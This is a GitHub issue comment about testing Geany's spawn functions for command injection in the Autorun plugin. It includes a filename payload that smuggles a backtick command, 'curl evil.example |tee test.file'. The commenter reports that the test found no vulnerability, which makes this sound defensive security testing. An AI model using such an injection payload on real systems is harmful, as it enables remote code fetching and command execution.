WrapEarnPass left a comment (geany/geany-plugins#1584)

Does [geany](https://www.geany.org/manual/reference/spawn_8h.html) spawn_sync 
or spawn_with_callbacks suffer from this vulnerability by default?
geany/testing,now 2.1-2 from debian.
Autorun@ecb8948276418a7eef897b5adb516181a5c72706 (before g_shell_quote was 
shoved in as a mitigation)
src/spawn.c@229 ```spawn_with_callbacks(current_cmd->working_dir, 
current_cmd->command, NULL``` an unescaped "command with arguments" put in the 
command and not the argv of spawn_with_callbacks
src/spawn.c@287```spawn_sync(current_cmd->working_dir, current_cmd->command, 
NULL``` an unescaped "command with arguments" put in the command and not the 
argv of spawn_sync

Action performed: save File ```'test`curl evil.example |tee test.file`.c'``` 
which should invoke the Autorun C Before-Save@287 and On-Save@229 commands.
Safe results: Command not runnable, or a clang-format and clang-tidy error.
Indication of compromise: A curl error about evil.example, or test.file 
creation in WD

Actual results

<img width="1359" height="525" alt="Image" 
src="https://github.com/user-attachments/assets/1398fd44-1cd1-4ad6-a544-76e1df666416";
 />

No test.file was created.

both spawn_with_callbacks and spawn_sync are not vulnerable regardless of 
whether or not the command is escaped.

Since the ```g_spawn_command_line_sync``` and other invocations are not geany 
library calls, I would have to rely on the maintainer of each plugin to 
determine they have used those calls correctly, as I am not familiar with them.
I am updating the initial list to remove the known non-impacted library calls.




-- 
Reply to this email directly or view it on GitHub:
https://github.com/geany/geany-plugins/issues/1584#issuecomment-4860253197
You are receiving this because you are subscribed to this thread.

Message ID: <geany/geany-plugins/issues/1584/[email protected]>

Reply via email to